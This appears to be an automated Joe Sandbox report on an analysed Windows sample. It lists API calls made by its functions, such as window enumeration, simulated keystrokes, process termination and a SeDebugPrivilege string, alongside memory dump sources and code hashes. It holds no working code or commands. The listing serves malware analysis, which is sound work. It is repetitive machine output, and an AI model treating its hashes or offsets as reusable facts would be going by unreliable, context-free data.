                    APIs
                    • EnumChildWindows.USER32(?,0079AA64), ref: 0079A9A2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: ChildEnumWindows
                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                    • API String ID: 3555792229-1603158881
                    • Opcode ID: 7594bd65ae70f96790c079c05bad04ce2bef632756a5efa4d75564d42b521479
                    • Instruction ID: c1d162c2a5ba3cf0eff26e8d1d4021a2f4b17180c533e478482c39d7cee092fb
                    • Opcode Fuzzy Hash: 7594bd65ae70f96790c079c05bad04ce2bef632756a5efa4d75564d42b521479
                    • Instruction Fuzzy Hash: 77918070A0160AFBDF08DF60D486BE9FB74BF04314F508129E99AA7251DB387A59CBD1
                    APIs
                    • SetWindowLongW.USER32(?,000000EB), ref: 00742EAE
                      • Part of subcall function 00741DB3: GetClientRect.USER32(?,?), ref: 00741DDC
                      • Part of subcall function 00741DB3: GetWindowRect.USER32(?,?), ref: 00741E1D
                      • Part of subcall function 00741DB3: ScreenToClient.USER32(?,?), ref: 00741E45
                    • GetDC.USER32 ref: 0077CF82
                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0077CF95
                    • SelectObject.GDI32(00000000,00000000), ref: 0077CFA3
                    • SelectObject.GDI32(00000000,00000000), ref: 0077CFB8
                    • ReleaseDC.USER32(?,00000000), ref: 0077CFC0
                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0077D04B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                    • String ID: U
                    • API String ID: 4009187628-3372436214
                    • Opcode ID: 07592c6984fddcdd8c5baf7c872e71a22c77df6d1be7eb185d0c8b20f235c15e
                    • Instruction ID: 865c8e7b3bb46bb6d2d246e48e29557281d557f5b5f57e20298a446f1e5b0b31
                    • Opcode Fuzzy Hash: 07592c6984fddcdd8c5baf7c872e71a22c77df6d1be7eb185d0c8b20f235c15e
                    • Instruction Fuzzy Hash: D171C431500205DFCF219F64CC84ABA7BB6FF49390F14826EFD595A266D7398C62DB60
                    APIs
                      • Part of subcall function 00742612: GetWindowLongW.USER32(?,000000EB), ref: 00742623
                      • Part of subcall function 00742344: GetCursorPos.USER32(?), ref: 00742357
                      • Part of subcall function 00742344: ScreenToClient.USER32(008067B0,?), ref: 00742374
                      • Part of subcall function 00742344: GetAsyncKeyState.USER32(00000001), ref: 00742399
                      • Part of subcall function 00742344: GetAsyncKeyState.USER32(00000002), ref: 007423A7
                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 007CC2E4
                    • ImageList_EndDrag.COMCTL32 ref: 007CC2EA
                    • ReleaseCapture.USER32 ref: 007CC2F0
                    • SetWindowTextW.USER32(?,00000000), ref: 007CC39A
                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 007CC3AD
                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 007CC48F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                    • API String ID: 1924731296-2107944366
                    • Opcode ID: d553e29b3fdd47fdbfc5c2b2c3786c880a590b67b3105574cbc6947bd8a591b9
                    • Instruction ID: b3c17ad0e9f54eac4c50fba4a74767fa8034829e586560e2525f86b38b1ab11c
                    • Opcode Fuzzy Hash: d553e29b3fdd47fdbfc5c2b2c3786c880a590b67b3105574cbc6947bd8a591b9
                    • Instruction Fuzzy Hash: AC517A70204304EFD704DF24CC5AF6A7BE5FB88314F04852DF5959B2A1DB78A969CB52
                    APIs
                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,007CF910), ref: 007B903D
                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,007CF910), ref: 007B9071
                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 007B91EB
                    • SysFreeString.OLEAUT32(?), ref: 007B9215
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                    • String ID:
                    • API String ID: 560350794-0
                    • Opcode ID: a6ebf85d918c7eae33da264f848091a0736ee0da32ed8acc881d3aac43b07401
                    • Instruction ID: 5c94538ae01a1363eee5cd0f5d51f8c12a51aa56d83d58c889bc3d6b932d3aff
                    • Opcode Fuzzy Hash: a6ebf85d918c7eae33da264f848091a0736ee0da32ed8acc881d3aac43b07401
                    • Instruction Fuzzy Hash: 4CF1F771A00209EFDB04DF94C888EEEB7B9FF49315F108459F625AB251DB35AE46CB60
                    APIs
                    • _memset.LIBCMT ref: 007BF9C9
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007BFB5C
                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 007BFB80
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007BFBC0
                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 007BFBE2
                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 007BFD5E
                    • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 007BFD90
                    • CloseHandle.KERNEL32(?), ref: 007BFDBF
                    • CloseHandle.KERNEL32(?), ref: 007BFE36
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                    • String ID:
                    • API String ID: 4090791747-0
                    • Opcode ID: 74661d8709ed1fc5cb21c7733e664a0acd4552038a4a6d413e7f81c2f808e1f4
                    • Instruction ID: 4fe69d96d24c11fd7396d41deaa11dcdbb71e127f411db4fd8077ccd05cd8c2f
                    • Opcode Fuzzy Hash: 74661d8709ed1fc5cb21c7733e664a0acd4552038a4a6d413e7f81c2f808e1f4
                    • Instruction Fuzzy Hash: C2E1D631204341DFCB14EF24C895BABBBE1AF85710F14856DF89A9B2A2DB39DC45CB52
                    APIs
                      • Part of subcall function 007A48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,007A38D3,?), ref: 007A48C7
                      • Part of subcall function 007A48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,007A38D3,?), ref: 007A48E0
                      • Part of subcall function 007A4CD3: GetFileAttributesW.KERNEL32(?,007A3947), ref: 007A4CD4
                    • lstrcmpiW.KERNEL32(?,?), ref: 007A4FE2
                    • _wcscmp.LIBCMT ref: 007A4FFC
                    • MoveFileW.KERNEL32(?,?), ref: 007A5017
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                    • String ID:
                    • API String ID: 793581249-0
                    • Opcode ID: f69965f11becab18780042d00dd36261c1d3a676a1e67d109cbc649bcd2f2db4
                    • Instruction ID: fabfa94172260674d5f27cc6d88066c7523c40329aceaa7fc519a058e6352de3
                    • Opcode Fuzzy Hash: f69965f11becab18780042d00dd36261c1d3a676a1e67d109cbc649bcd2f2db4
                    • Instruction Fuzzy Hash: 865182B21087849BC724DB60C8859DFB3ECAFC5300F004A2EF589D3152EF79A289C766
                    APIs
                    • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 007C896E
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: InvalidateRect
                    • String ID:
                    • API String ID: 634782764-0
                    • Opcode ID: be89be742395e499b415e2966515e4568375de11eb464ce65f6b8c70ce90a0ce
                    • Instruction ID: 770193d115e8cba2685cfa9248f579b1d3953150de8f893f9c5da058bc117f46
                    • Opcode Fuzzy Hash: be89be742395e499b415e2966515e4568375de11eb464ce65f6b8c70ce90a0ce
                    • Instruction Fuzzy Hash: B5518230510209FEDF609F24CC89FAD7BA5BB05310F60812EF515E66A1DF79AD909B92
                    APIs
                    • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0077C547
                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0077C569
                    • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0077C581
                    • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0077C59F
                    • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0077C5C0
                    • DestroyIcon.USER32(00000000), ref: 0077C5CF
                    • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0077C5EC
                    • DestroyIcon.USER32(?), ref: 0077C5FB
                      • Part of subcall function 007CA71E: DeleteObject.GDI32(00000000), ref: 007CA757
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                    • String ID:
                    • API String ID: 2819616528-0
                    • Opcode ID: ab998372f4c572b41028417eb9d3145f7d1e6ff417b82456fb2efb2dbaf77ed8
                    • Instruction ID: 3192e3503cfe7d54ecbf66b6df98cb2d291239c7fc79f2b366dc6bd516fd7773
                    • Opcode Fuzzy Hash: ab998372f4c572b41028417eb9d3145f7d1e6ff417b82456fb2efb2dbaf77ed8
                    • Instruction Fuzzy Hash: DA514970600209EFDB24DF24CC45FAA3BA5FB58350F50852CF906972A1EB79E9A1DB60
                    APIs
                      • Part of subcall function 0079AE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 0079AE77
                      • Part of subcall function 0079AE57: GetCurrentThreadId.KERNEL32 ref: 0079AE7E
                      • Part of subcall function 0079AE57: AttachThreadInput.USER32(00000000,?,00799B65,?,00000001), ref: 0079AE85
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00799B70
                    • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00799B8D
                    • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00799B90
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00799B99
                    • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00799BB7
                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00799BBA
                    • MapVirtualKeyW.USER32(00000025,00000000), ref: 00799BC3
                    • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00799BDA
                    • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00799BDD
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                    • String ID:
                    • API String ID: 2014098862-0
                    • Opcode ID: db75caaa445c2a796872b65d0379e167cbc9247110f65a4fa0508c1881446b1f
                    • Instruction ID: d24d8801b5fc8973d622b36a08664adccd239b2206ee2e9235306efd4e87d69b
                    • Opcode Fuzzy Hash: db75caaa445c2a796872b65d0379e167cbc9247110f65a4fa0508c1881446b1f
                    • Instruction Fuzzy Hash: CF11E5B1550218FFFA106B64EC4EF6A3B1EDB4C755F114429F344AB0A0CAF75C10DAA8
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00798A84,00000B00,?,?), ref: 00798E0C
                    • HeapAlloc.KERNEL32(00000000,?,00798A84,00000B00,?,?), ref: 00798E13
                    • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00798A84,00000B00,?,?), ref: 00798E28
                    • GetCurrentProcess.KERNEL32(?,00000000,?,00798A84,00000B00,?,?), ref: 00798E30
                    • DuplicateHandle.KERNEL32(00000000,?,00798A84,00000B00,?,?), ref: 00798E33
                    • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00798A84,00000B00,?,?), ref: 00798E43
                    • GetCurrentProcess.KERNEL32(00798A84,00000000,?,00798A84,00000B00,?,?), ref: 00798E4B
                    • DuplicateHandle.KERNEL32(00000000,?,00798A84,00000B00,?,?), ref: 00798E4E
                    • CreateThread.KERNEL32(00000000,00000000,00798E74,00000000,00000000,00000000), ref: 00798E68
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                    • String ID:
                    • API String ID: 1957940570-0
                    • Opcode ID: 2e4eca02cc2f91572e7a92a32d85efa40526a2ed900000a9d3236de6f6e3e3d3
                    • Instruction ID: 7f1bb77e811dee341387f0a00a60f81c00bd63995a15f1754925bef618d68dab
                    • Opcode Fuzzy Hash: 2e4eca02cc2f91572e7a92a32d85efa40526a2ed900000a9d3236de6f6e3e3d3
                    • Instruction Fuzzy Hash: 4801BBB5240308FFE710ABA5DC4DF6B7BADEB89711F048425FA05DB2A1CA749C00CB24
                    APIs
                      • Part of subcall function 00797652: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0079758C,80070057,?,?,?,0079799D), ref: 0079766F
                      • Part of subcall function 00797652: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0079758C,80070057,?,?), ref: 0079768A
                      • Part of subcall function 00797652: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0079758C,80070057,?,?), ref: 00797698
                      • Part of subcall function 00797652: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,0079758C,80070057,?), ref: 007976A8
                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 007B9B1B
                    • _memset.LIBCMT ref: 007B9B28
                    • _memset.LIBCMT ref: 007B9C6B
                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 007B9C97
                    • CoTaskMemFree.OLE32(?), ref: 007B9CA2
                    Strings
                    • NULL Pointer assignment, xrefs: 007B9CF0
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                    • String ID: NULL Pointer assignment
                    • API String ID: 1300414916-2785691316
                    • Opcode ID: 8926d5431121316393aaba4b1fe688bb008c79ff8f82c23fd3555eebcb7ed52a
                    • Instruction ID: 3adc7c694173db17737113857bd7654a69438b4fdf346619cc6841c95e5b3182
                    • Opcode Fuzzy Hash: 8926d5431121316393aaba4b1fe688bb008c79ff8f82c23fd3555eebcb7ed52a
                    • Instruction Fuzzy Hash: 02913A71D00229EBDF10DFA5DC85EDEBBB9AF08710F20815AF619A7281DB755A44CFA0
                    APIs
                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007C7093
                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 007C70A7
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007C70C1
                    • _wcscat.LIBCMT ref: 007C711C
                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 007C7133
                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007C7161
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: MessageSend$Window_wcscat
                    • String ID: SysListView32
                    • API String ID: 307300125-78025650
                    • Opcode ID: 993247d255c351aff7e305bba8e82e585717ed9e1b41f273540af0d36be4311b
                    • Instruction ID: f8ddd87b321d4d95bae0fda4e1b36faf5fb89d5e950cb87a879facd668b58f68
                    • Opcode Fuzzy Hash: 993247d255c351aff7e305bba8e82e585717ed9e1b41f273540af0d36be4311b
                    • Instruction Fuzzy Hash: 9E418071A04308EBDB259F64CC89FEA77A9EF08350F10452EF544A7292D6799D84CB50
                    APIs
                      • Part of subcall function 007A3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 007A3EB6
                      • Part of subcall function 007A3E91: Process32FirstW.KERNEL32(00000000,?), ref: 007A3EC4
                      • Part of subcall function 007A3E91: CloseHandle.KERNEL32(00000000), ref: 007A3F8E
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007BECB8
                    • GetLastError.KERNEL32 ref: 007BECCB
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007BECFA
                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 007BED77
                    • GetLastError.KERNEL32(00000000), ref: 007BED82
                    • CloseHandle.KERNEL32(00000000), ref: 007BEDB7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
                    • Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd
                    Similarity
                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                    • String ID: SeDebugPrivilege
                    • API String ID: 2533919879-2896544425
                    • Opcode ID: 985521397750016eb0be7090b924fc18e72d6869cb02a26af829e6d4ad3e2de8
                    • Instruction ID: 8c2e5e2a77aa1f19cb4e560f5b186247666a7d5e05d3fba7261831addc805ab8
                    • Opcode Fuzzy Hash: 985521397750016eb0be7090b924fc18e72d6869cb02a26af829e6d4ad3e2de8
                    • Instruction Fuzzy Hash: C8416D71304201DFDB14EF24CC99FAEB7A5AF81714F188459F9429B3D2DBB9A804CB95
                    APIs
                    • LoadIconW.USER32(00000000,00007F03), ref: 007A32C5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true
